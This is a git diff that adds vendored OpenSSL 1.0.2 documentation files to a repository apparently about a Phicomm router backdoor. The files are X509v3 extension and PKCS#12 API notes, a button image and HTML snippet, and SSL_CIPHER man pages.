+ASN1_ENUMERATED type, respectively.
+
+ASN1_OCTET_STRING *s2i_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method,
+                                                   X509V3_CTX *ctx, char *str);
+
+This converts an ASCII hex string to an ASN1_OCTET_STRING.
+
+ASN1_INTEGER * s2i_ASN1_INTEGER(X509V3_EXT_METHOD *meth, char *value);
+
+This converts a decimal ASCII string into an ASN1_INTEGER.
+
+6. Multi valued extension helper functions.
+
+The following functions can be used to manipulate STACKs of CONF_VALUE
+structures, as used by multi valued extensions.
+
+int X509V3_get_value_bool(CONF_VALUE *value, int *asn1_bool);
+
+This function expects a boolean value in 'value' and sets 'asn1_bool' to
+it. That is it sets it to 0 for FALSE or 0xff for TRUE. The following
+strings are acceptable: "TRUE", "true", "Y", "y", "YES", "yes", "FALSE"
+"false", "N", "n", "NO" or "no".
+
+int X509V3_get_value_int(CONF_VALUE *value, ASN1_INTEGER **aint);
+
+This accepts a decimal integer of arbitrary length and sets an ASN1_INTEGER.
+
+int X509V3_add_value(const char *name, const char *value,
+						STACK_OF(CONF_VALUE) **extlist);
+
+This simply adds a string name and value pair.
+
+int X509V3_add_value_uchar(const char *name, const unsigned char *value,
+                          			STACK_OF(CONF_VALUE) **extlist);
+
+The same as above but for an unsigned character value.
+
+int X509V3_add_value_bool(const char *name, int asn1_bool,
+						STACK_OF(CONF_VALUE) **extlist);
+
+This adds either "TRUE" or "FALSE" depending on the value of 'asn1_bool'
+
+int X509V3_add_value_bool_nf(char *name, int asn1_bool,
+						STACK_OF(CONF_VALUE) **extlist);
+
+This is the same as above except it adds nothing if asn1_bool is FALSE.
+
+int X509V3_add_value_int(const char *name, ASN1_INTEGER *aint,
+						STACK_OF(CONF_VALUE) **extlist);
+
+This function adds the value of the ASN1_INTEGER in decimal form.
+
+7. Other helper functions.
+
+<to be added>
+
+ADDING CUSTOM EXTENSIONS.
+
+Currently there are three types of supported extensions. 
+
+String extensions are simple strings where the value is placed directly in the
+extensions, and the string returned is printed out.
+
+Multi value extensions are passed a STACK_OF(CONF_VALUE) name and value pairs
+or return a STACK_OF(CONF_VALUE).
+
+Raw extensions are just passed a BIO or a value and it is the extensions
+responsibility to handle all the necessary printing.
+
+There are two ways to add an extension. One is simply as an alias to an already
+existing extension. An alias is an extension that is identical in ASN1 structure
+to an existing extension but has a different OBJECT IDENTIFIER. This can be
+done by calling:
+
+int X509V3_EXT_add_alias(int nid_to, int nid_from);
+
+'nid_to' is the new extension NID and 'nid_from' is the already existing
+extension NID.
+
+Alternatively an extension can be written from scratch. This involves writing
+the ASN1 code to encode and decode the extension and functions to print out and
+generate the extension from strings. The relevant functions are then placed in
+a X509V3_EXT_METHOD structure and int X509V3_EXT_add(X509V3_EXT_METHOD *ext);
+called.
+
+The X509V3_EXT_METHOD structure is described below.
+
+struct {
+int ext_nid;
+int ext_flags;
+X509V3_EXT_NEW ext_new;
+X509V3_EXT_FREE ext_free;
+X509V3_EXT_D2I d2i;
+X509V3_EXT_I2D i2d;
+X509V3_EXT_I2S i2s;
+X509V3_EXT_S2I s2i;
+X509V3_EXT_I2V i2v;
+X509V3_EXT_V2I v2i;
+X509V3_EXT_R2I r2i;
+X509V3_EXT_I2R i2r;
+
+void *usr_data;
+};
+
+The elements have the following meanings.
+
+ext_nid		is the NID of the object identifier of the extension.
+
+ext_flags	is set of flags. Currently the only external flag is
+		X509V3_EXT_MULTILINE which means a multi valued extensions
+		should be printed on separate lines.
+
+usr_data	is an extension specific pointer to any relevant data. This
+		allows extensions to share identical code but have different
+		uses. An example of this is the bit string extension which uses
+		usr_data to contain a list of the bit names.
+
+All the remaining elements are function pointers.
+
+ext_new		is a pointer to a function that allocates memory for the
+		extension ASN1 structure: for example ASN1_OBJECT_new().
+
+ext_free	is a pointer to a function that free up memory of the extension
+		ASN1 structure: for example ASN1_OBJECT_free().
+
+d2i		is the standard ASN1 function that converts a DER buffer into
+		the internal ASN1 structure: for example d2i_ASN1_IA5STRING().
+
+i2d		is the standard ASN1 function that converts the internal
+		structure into the DER representation: for example
+		i2d_ASN1_IA5STRING().
+
+The remaining functions are depend on the type of extension. One i2X and
+one X2i should be set and the rest set to NULL. The types set do not need
+to match up, for example the extension could be set using the multi valued
+v2i function and printed out using the raw i2r.
+
+All functions have the X509V3_EXT_METHOD passed to them in the 'method'
+parameter and an X509V3_CTX structure. Extension code can then access the
+parent structure via the 'method' parameter to for example make use of the value
+of usr_data. If the code needs to use detail relating to the request it can
+use the 'ctx' parameter.
+
+A note should be given here about the 'flags' member of the 'ctx' parameter.
+If it has the value CTX_TEST then the configuration syntax is being checked
+and no actual certificate or CRL exists. Therefore any attempt in the config
+file to access such information should silently succeed. If the syntax is OK
+then it should simply return a (possibly bogus) extension, otherwise it
+should return NULL.
+
+char *i2s(struct v3_ext_method *method, void *ext);
+
+This function takes the internal structure in the ext parameter and returns
+a Malloc'ed string representing its value.
+
+void * s2i(struct v3_ext_method *method, struct v3_ext_ctx *ctx, char *str);
+
+This function takes the string representation in the ext parameter and returns
+an allocated internal structure: ext_free() will be used on this internal
+structure after use.
+
+i2v and v2i handle a STACK_OF(CONF_VALUE):
+
+typedef struct
+{
+        char *section;
+        char *name;
+        char *value;
+} CONF_VALUE;
+
+Only the name and value members are currently used.
+
+STACK_OF(CONF_VALUE) * i2v(struct v3_ext_method *method, void *ext);
+
+This function is passed the internal structure in the ext parameter and
+returns a STACK of CONF_VALUE structures. The values of name, value,
+section and the structure itself will be freed up with Free after use.
+Several helper functions are available to add values to this STACK.
+
+void * v2i(struct v3_ext_method *method, struct v3_ext_ctx *ctx,
+						STACK_OF(CONF_VALUE) *values);
+
+This function takes a STACK_OF(CONF_VALUE) structures and should set the
+values of the external structure. This typically uses the name element to
+determine which structure element to set and the value element to determine
+what to set it to. Several helper functions are available for this
+purpose (see above).
+
+int i2r(struct v3_ext_method *method, void *ext, BIO *out, int indent);
+
+This function is passed the internal extension structure in the ext parameter
+and sends out a human readable version of the extension to out. The 'indent'
+parameter should be noted to determine the necessary amount of indentation
+needed on the output.
+
+void * r2i(struct v3_ext_method *method, struct v3_ext_ctx *ctx, char *str);
+
+This is just passed the string representation of the extension. It is intended
+to be used for more elaborate extensions where the standard single and multi
+valued options are insufficient. They can use the 'ctx' parameter to parse the
+configuration database themselves. See the context functions section for details
+of how to do this.
+
+Note: although this type takes the same parameters as the "r2s" function there
+is a subtle difference. Whereas an "r2i" function can access a configuration
+database an "s2i" function MUST NOT. This is so the internal code can safely
+assume that an "s2i" function will work without a configuration database.
+
+==============================================================================
+                            PKCS#12 Library
+==============================================================================
+
+This section describes the internal PKCS#12 support. There are very few
+differences between the old external library and the new internal code at
+present. This may well change because the external library will not be updated
+much in future.
+
+This version now includes a couple of high level PKCS#12 functions which
+generally "do the right thing" and should make it much easier to handle PKCS#12
+structures.
+
+HIGH LEVEL FUNCTIONS.
+
+For most applications you only need concern yourself with the high level
+functions. They can parse and generate simple PKCS#12 files as produced by
+Netscape and MSIE or indeed any compliant PKCS#12 file containing a single
+private key and certificate pair.
+
+1. Initialisation and cleanup.
+
+No special initialisation is needed for the internal PKCS#12 library: the 
+standard SSLeay_add_all_algorithms() is sufficient. If you do not wish to
+add all algorithms (you should at least add SHA1 though) then you can manually
+initialise the PKCS#12 library with:
+
+PKCS12_PBE_add();
+
+The memory allocated by the PKCS#12 library is freed up when EVP_cleanup() is
+called or it can be directly freed with:
+
+EVP_PBE_cleanup();
+
+after this call (or EVP_cleanup() ) no more PKCS#12 library functions should
+be called.
+
+2. I/O functions.
+
+i2d_PKCS12_bio(bp, p12)
+
+This writes out a PKCS12 structure to a BIO.
+
+i2d_PKCS12_fp(fp, p12)
+
+This is the same but for a FILE pointer.
+
+d2i_PKCS12_bio(bp, p12)
+
+This reads in a PKCS12 structure from a BIO.
+
+d2i_PKCS12_fp(fp, p12)
+
+This is the same but for a FILE pointer.
+
+3. High level functions.
+
+3.1 Parsing with PKCS12_parse().
+
+int PKCS12_parse(PKCS12 *p12, char *pass, EVP_PKEY **pkey, X509 **cert,
+								 STACK **ca);
+
+This function takes a PKCS12 structure and a password (ASCII, null terminated)
+and returns the private key, the corresponding certificate and any CA
+certificates. If any of these is not required it can be passed as a NULL.
+The 'ca' parameter should be either NULL, a pointer to NULL or a valid STACK
+structure. Typically to read in a PKCS#12 file you might do:
+
+p12 = d2i_PKCS12_fp(fp, NULL);
+PKCS12_parse(p12, password, &pkey, &cert, NULL); 	/* CAs not wanted */
+PKCS12_free(p12);
+
+3.2 PKCS#12 creation with PKCS12_create().
+
+PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert,
+			STACK *ca, int nid_key, int nid_cert, int iter,
+						 int mac_iter, int keytype);
+
+This function will create a PKCS12 structure from a given password, name,
+private key, certificate and optional STACK of CA certificates. The remaining
+5 parameters can be set to 0 and sensible defaults will be used.
+
+The parameters nid_key and nid_cert are the key and certificate encryption
+algorithms, iter is the encryption iteration count, mac_iter is the MAC
+iteration count and keytype is the type of private key. If you really want
+to know what these last 5 parameters do then read the low level section.
+
+Typically to create a PKCS#12 file the following could be used:
+
+p12 = PKCS12_create(pass, "My Certificate", pkey, cert, NULL, 0,0,0,0,0);
+i2d_PKCS12_fp(fp, p12);
+PKCS12_free(p12);
+
+3.3 Changing a PKCS#12 structure password.
+
+int PKCS12_newpass(PKCS12 *p12, char *oldpass, char *newpass);
+
+This changes the password of an already existing PKCS#12 structure. oldpass
+is the old password and newpass is the new one. An error occurs if the old
+password is incorrect.
+
+LOW LEVEL FUNCTIONS.
+
+In some cases the high level functions do not provide the necessary
+functionality. For example if you want to generate or parse more complex
+PKCS#12 files. The sample pkcs12 application uses the low level functions
+to display details about the internal structure of a PKCS#12 file.
+
+Introduction.
+
+This is a brief description of how a PKCS#12 file is represented internally:
+some knowledge of PKCS#12 is assumed.
+
+A PKCS#12 object contains several levels.
+
+At the lowest level is a PKCS12_SAFEBAG. This can contain a certificate, a
+CRL, a private key, encrypted or unencrypted, a set of safebags (so the
+structure can be nested) or other secrets (not documented at present). 
+A safebag can optionally have attributes, currently these are: a unicode
+friendlyName (a Unicode string) or a localKeyID (a string of bytes).
+
+At the next level is an authSafe which is a set of safebags collected into
+a PKCS#7 ContentInfo. This can be just plain data, or encrypted itself.
+
+At the top level is the PKCS12 structure itself which contains a set of
+authSafes in an embedded PKCS#7 Contentinfo of type data. In addition it
+contains a MAC which is a kind of password protected digest to preserve
+integrity (so any unencrypted stuff below can't be tampered with).
+
+The reason for these levels is so various objects can be encrypted in various
+ways. For example you might want to encrypt a set of private keys with
+triple-DES and then include the related certificates either unencrypted or
+with lower encryption. Yes it's the dreaded crypto laws at work again which
+allow strong encryption on private keys and only weak encryption on other
+stuff.
+
+To build one of these things you turn all certificates and keys into safebags
+(with optional attributes). You collect the safebags into (one or more) STACKS
+and convert these into authsafes (encrypted or unencrypted).  The authsafes
+are collected into a STACK and added to a PKCS12 structure.  Finally a MAC
+inserted.
+
+Pulling one apart is basically the reverse process. The MAC is verified against
+the given password. The authsafes are extracted and each authsafe split into
+a set of safebags (possibly involving decryption). Finally the safebags are
+decomposed into the original keys and certificates and the attributes used to
+match up private key and certificate pairs.
+
+Anyway here are the functions that do the dirty work.
+
+1. Construction functions.
+
+1.1 Safebag functions.
+
+M_PKCS12_x5092certbag(x509)
+
+This macro takes an X509 structure and returns a certificate bag. The
+X509 structure can be freed up after calling this function.
+
+M_PKCS12_x509crl2certbag(crl)
+
+As above but for a CRL.
+
+PKCS8_PRIV_KEY_INFO *PKEY2PKCS8(EVP_PKEY *pkey)
+
+Take a private key and convert it into a PKCS#8 PrivateKeyInfo structure.
+Works for both RSA and DSA private keys. NB since the PKCS#8 PrivateKeyInfo
+structure contains a private key data in plain text form it should be free'd
+up as soon as it has been encrypted for security reasons (freeing up the
+structure zeros out the sensitive data). This can be done with
+PKCS8_PRIV_KEY_INFO_free().
+
+PKCS8_add_keyusage(PKCS8_PRIV_KEY_INFO *p8, int usage)
+
+This sets the key type when a key is imported into MSIE or Outlook 98. Two
+values are currently supported: KEY_EX and KEY_SIG. KEY_EX is an exchange type
+key that can also be used for signing but its size is limited in the export
+versions of MS software to 512 bits, it is also the default. KEY_SIG is a
+signing only key but the keysize is unlimited (well 16K is supposed to work).
+If you are using the domestic version of MSIE then you can ignore this because
+KEY_EX is not limited and can be used for both.
+
+PKCS12_SAFEBAG *PKCS12_MAKE_KEYBAG(PKCS8_PRIV_KEY_INFO *p8)
+
+Convert a PKCS8 private key structure into a keybag. This routine embeds the
+p8 structure in the keybag so p8 should not be freed up or used after it is
+called.  The p8 structure will be freed up when the safebag is freed.
+
+PKCS12_SAFEBAG *PKCS12_MAKE_SHKEYBAG(int pbe_nid, unsigned char *pass, int passlen, unsigned char *salt, int saltlen, int iter, PKCS8_PRIV_KEY_INFO *p8)
+
+Convert a PKCS#8 structure into a shrouded key bag (encrypted). p8 is not
+embedded and can be freed up after use.
+
+int PKCS12_add_localkeyid(PKCS12_SAFEBAG *bag, unsigned char *name, int namelen)
+int PKCS12_add_friendlyname(PKCS12_SAFEBAG *bag, unsigned char *name, int namelen)
+
+Add a local key id or a friendlyname to a safebag.
+
+1.2 Authsafe functions.
+
+PKCS7 *PKCS12_pack_p7data(STACK *sk)
+Take a stack of safebags and convert them into an unencrypted authsafe. The
+stack of safebags can be freed up after calling this function.
+
+PKCS7 *PKCS12_pack_p7encdata(int pbe_nid, unsigned char *pass, int passlen, unsigned char *salt, int saltlen, int iter, STACK *bags);
+
+As above but encrypted.
+
+1.3 PKCS12 functions.
+
+PKCS12 *PKCS12_init(int mode)
+
+Initialise a PKCS12 structure (currently mode should be NID_pkcs7_data).
+
+M_PKCS12_pack_authsafes(p12, safes)
+
+This macro takes a STACK of authsafes and adds them to a PKCS#12 structure.
+
+int PKCS12_set_mac(PKCS12 *p12, unsigned char *pass, int passlen, unsigned char *salt, int saltlen, int iter, EVP_MD *md_type);
+
+Add a MAC to a PKCS12 structure. If EVP_MD is NULL use SHA-1, the spec suggests
+that SHA-1 should be used.
+
+2. Extraction Functions.
+
+2.1 Safebags.
+
+M_PKCS12_bag_type(bag)
+
+Return the type of "bag". Returns one of the following
+
+NID_keyBag
+NID_pkcs8ShroudedKeyBag			7
+NID_certBag				8
+NID_crlBag				9
+NID_secretBag				10
+NID_safeContentsBag			11
+
+M_PKCS12_cert_bag_type(bag)
+
+Returns type of certificate bag, following are understood.
+
+NID_x509Certificate			14
+NID_sdsiCertificate			15
+
+M_PKCS12_crl_bag_type(bag)
+
+Returns crl bag type, currently only NID_crlBag is recognised.
+
+M_PKCS12_certbag2x509(bag)
+
+This macro extracts an X509 certificate from a certificate bag.
+
+M_PKCS12_certbag2x509crl(bag)
+
+As above but for a CRL.
+
+EVP_PKEY * PKCS82PKEY(PKCS8_PRIV_KEY_INFO *p8)
+
+Extract a private key from a PKCS8 private key info structure.
+
+M_PKCS12_decrypt_skey(bag, pass, passlen) 
+
+Decrypt a shrouded key bag and return a PKCS8 private key info structure.
+Works with both RSA and DSA keys
+
+char *PKCS12_get_friendlyname(bag)
+
+Returns the friendlyName of a bag if present or NULL if none. The returned
+string is a null terminated ASCII string allocated with Malloc(). It should 
+thus be freed up with Free() after use.
+
+2.2 AuthSafe functions.
+
+M_PKCS12_unpack_p7data(p7)
+
+Extract a STACK of safe bags from a PKCS#7 data ContentInfo.
+
+#define M_PKCS12_unpack_p7encdata(p7, pass, passlen)
+
+As above but for an encrypted content info.
+
+2.3 PKCS12 functions.
+
+M_PKCS12_unpack_authsafes(p12)
+
+Extract a STACK of authsafes from a PKCS12 structure.
+
+M_PKCS12_mac_present(p12)
+
+Check to see if a MAC is present.
+
+int PKCS12_verify_mac(PKCS12 *p12, unsigned char *pass, int passlen)
+
+Verify a MAC on a PKCS12 structure. Returns an error if MAC not present.
+
+
+Notes.
+
+1. All the function return 0 or NULL on error.
+2. Encryption based functions take a common set of parameters. These are
+described below.
+
+pass, passlen
+ASCII password and length. The password on the MAC is called the "integrity
+password" the encryption password is called the "privacy password" in the
+PKCS#12 documentation. The passwords do not have to be the same. If -1 is
+passed for the length it is worked out by the function itself (currently
+this is sometimes done whatever is passed as the length but that may change).
+
+salt, saltlen
+A 'salt' if salt is NULL a random salt is used. If saltlen is also zero a
+default length is used.
+
+iter
+Iteration count. This is a measure of how many times an internal function is
+called to encrypt the data. The larger this value is the longer it takes, it
+makes dictionary attacks on passwords harder. NOTE: Some implementations do
+not support an iteration count on the MAC. If the password for the MAC and
+encryption is the same then there is no point in having a high iteration
+count for encryption if the MAC has no count. The MAC could be attacked
+and the password used for the main decryption.
+
+pbe_nid
+This is the NID of the password based encryption method used. The following are
+supported.
+NID_pbe_WithSHA1And128BitRC4
+NID_pbe_WithSHA1And40BitRC4
+NID_pbe_WithSHA1And3_Key_TripleDES_CBC
+NID_pbe_WithSHA1And2_Key_TripleDES_CBC
+NID_pbe_WithSHA1And128BitRC2_CBC
+NID_pbe_WithSHA1And40BitRC2_CBC
+
+Which you use depends on the implementation you are exporting to. "Export
+grade" (i.e. cryptographically challenged) products cannot support all
+algorithms. Typically you may be able to use any encryption on shrouded key
+bags but they must then be placed in an unencrypted authsafe. Other authsafes
+may only support 40bit encryption. Of course if you are using SSLeay
+throughout you can strongly encrypt everything and have high iteration counts
+on everything.
+
+3. For decryption routines only the password and length are needed.
+
+4. Unlike the external version the nid's of objects are the values of the
+constants: that is NID_certBag is the real nid, therefore there is no 
+PKCS12_obj_offset() function.  Note the object constants are not the same as
+those of the external version. If you use these constants then you will need
+to recompile your code.
+
+5. With the exception of PKCS12_MAKE_KEYBAG(), after calling any function or 
+macro of the form PKCS12_MAKE_SOMETHING(other) the "other" structure can be
+reused or freed up safely.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl_button.gif b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl_button.gif
new file mode 100644
index 0000000000000000000000000000000000000000..3d3c90c9f849929d0b26bed710e00f3f6f4f88cc
GIT binary patch
literal 2063
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
ARR910

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl_button.html b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl_button.html
new file mode 100644
index 0000000..44c91bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/openssl_button.html
@@ -0,0 +1,7 @@
+
+<!-- the `Includes OpenSSL Cryptogaphy Software' button      -->
+<!-- freely usable by any application linked against OpenSSL -->
+<a   href="http://www.openssl.org/">
+<img src="openssl_button.gif" 
+     width=102 height=47 border=0></a>
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CIPHER_get_name.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CIPHER_get_name.pod
new file mode 100644
index 0000000..c598f4d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CIPHER_get_name.pod
@@ -0,0 +1,132 @@
+=pod
+
+=head1 NAME
+
+SSL_CIPHER_get_name, SSL_CIPHER_get_bits, SSL_CIPHER_get_version, SSL_CIPHER_description - get SSL_CIPHER properties
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ const char *SSL_CIPHER_get_name(const SSL_CIPHER *cipher);
+ int SSL_CIPHER_get_bits(const SSL_CIPHER *cipher, int *alg_bits);
+ char *SSL_CIPHER_get_version(const SSL_CIPHER *cipher);
+ char *SSL_CIPHER_description(const SSL_CIPHER *cipher, char *buf, int size);
+
+=head1 DESCRIPTION
+
+SSL_CIPHER_get_name() returns a pointer to the name of B<cipher>. If the
+argument is the NULL pointer, a pointer to the constant value "NONE" is
+returned.
+
+SSL_CIPHER_get_bits() returns the number of secret bits used for B<cipher>. If
+B<alg_bits> is not NULL, it contains the number of bits processed by the
+chosen algorithm. If B<cipher> is NULL, 0 is returned.
+
+SSL_CIPHER_get_version() returns string which indicates the SSL/TLS protocol
+version that first defined the cipher.
+This is currently B<SSLv2> or B<TLSv1/SSLv3>.
+In some cases it should possibly return "TLSv1.2" but does not;
+use SSL_CIPHER_description() instead.
+If B<cipher> is NULL, "(NONE)" is returned.
+
+SSL_CIPHER_description() returns a textual description of the cipher used
+into the buffer B<buf> of length B<len> provided. B<len> must be at least
+128 bytes, otherwise a pointer to the string "Buffer too small" is
+returned. If B<buf> is NULL, a buffer of 128 bytes is allocated using
+OPENSSL_malloc(). If the allocation fails, a pointer to the string
+"OPENSSL_malloc Error" is returned.
+
+=head1 NOTES
+
+The number of bits processed can be different from the secret bits. An
+export cipher like e.g. EXP-RC4-MD5 has only 40 secret bits. The algorithm
+does use the full 128 bits (which would be returned for B<alg_bits>), of
+which however 88bits are fixed. The search space is hence only 40 bits.
+
+The string returned by SSL_CIPHER_description() in case of success consists
+of cleartext information separated by one or more blanks in the following
+sequence:
+
+=over 4
+
+=item <ciphername>
+
+Textual representation of the cipher name.
+
+=item <protocol version>
+
+Protocol version: B<SSLv2>, B<SSLv3>, B<TLSv1.2>. The TLSv1.0 ciphers are
+flagged with SSLv3. No new ciphers were added by TLSv1.1.
+
+=item Kx=<key exchange>
+
+Key exchange method: B<RSA> (for export ciphers as B<RSA(512)> or
+B<RSA(1024)>), B<DH> (for export ciphers as B<DH(512)> or B<DH(1024)>),
+B<DH/RSA>, B<DH/DSS>, B<Fortezza>.
+
+=item Au=<authentication>
+
+Authentication method: B<RSA>, B<DSS>, B<DH>, B<None>. None is the
+representation of anonymous ciphers.
+
+=item Enc=<symmetric encryption method>
+
+Encryption method with number of secret bits: B<DES(40)>, B<DES(56)>,
+B<3DES(168)>, B<RC4(40)>, B<RC4(56)>, B<RC4(64)>, B<RC4(128)>,
+B<RC2(40)>, B<RC2(56)>, B<RC2(128)>, B<IDEA(128)>, B<Fortezza>, B<None>.
+
+=item Mac=<message authentication code>
+
+Message digest: B<MD5>, B<SHA1>.
+
+=item <export flag>
+
+If the cipher is flagged exportable with respect to old US crypto
+regulations, the word "B<export>" is printed.
+
+=back
+
+=head1 EXAMPLES
+
+Some examples for the output of SSL_CIPHER_description():
+
+ EDH-RSA-DES-CBC3-SHA    SSLv3 Kx=DH       Au=RSA  Enc=3DES(168) Mac=SHA1
+ EDH-DSS-DES-CBC3-SHA    SSLv3 Kx=DH       Au=DSS  Enc=3DES(168) Mac=SHA1
+ RC4-MD5                 SSLv3 Kx=RSA      Au=RSA  Enc=RC4(128)  Mac=MD5
+ EXP-RC4-MD5             SSLv3 Kx=RSA(512) Au=RSA  Enc=RC4(40)   Mac=MD5  export
+
+A comp[lete list can be retrieved by invoking the following command:
+
+ openssl ciphers -v ALL
+
+=head1 BUGS
+
+If SSL_CIPHER_description() is called with B<cipher> being NULL, the
+library crashes.
+
+If SSL_CIPHER_description() cannot handle a built-in cipher, the according
+description of the cipher property is B<unknown>. This case should not
+occur.
+
+The standard terminology for ephemeral Diffie-Hellman schemes is DHE
+(finite field) or ECDHE (elliptic curve).  This version of OpenSSL
+idiosyncratically reports these schemes as EDH and EECDH, even though
+it also accepts the standard terminology.
+
+It is recommended to use the standard terminology (DHE and ECDHE)
+during configuration (e.g. via SSL_CTX_set_cipher_list) for clarity of
+configuration.  OpenSSL versions after 1.0.2 will report the standard
+terms via SSL_CIPHER_get_name and SSL_CIPHER_description.
+
+=head1 RETURN VALUES
+
+See DESCRIPTION
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_get_current_cipher(3)|SSL_get_current_cipher(3)>,
+L<SSL_get_ciphers(3)|SSL_get_ciphers(3)>, L<ciphers(1)|ciphers(1)>,
+L<SSL_CTX_set_cipher_list(3)|SSL_CTX_set_cipher_list(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_COMP_add_compression_method.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_COMP_add_compression_method.pod
new file mode 100644
index 0000000..f4d191c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_COMP_add_compression_method.pod
@@ -0,0 +1,70 @@
+=pod
+
+=head1 NAME
+
+SSL_COMP_add_compression_method - handle SSL/TLS integrated compression methods
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
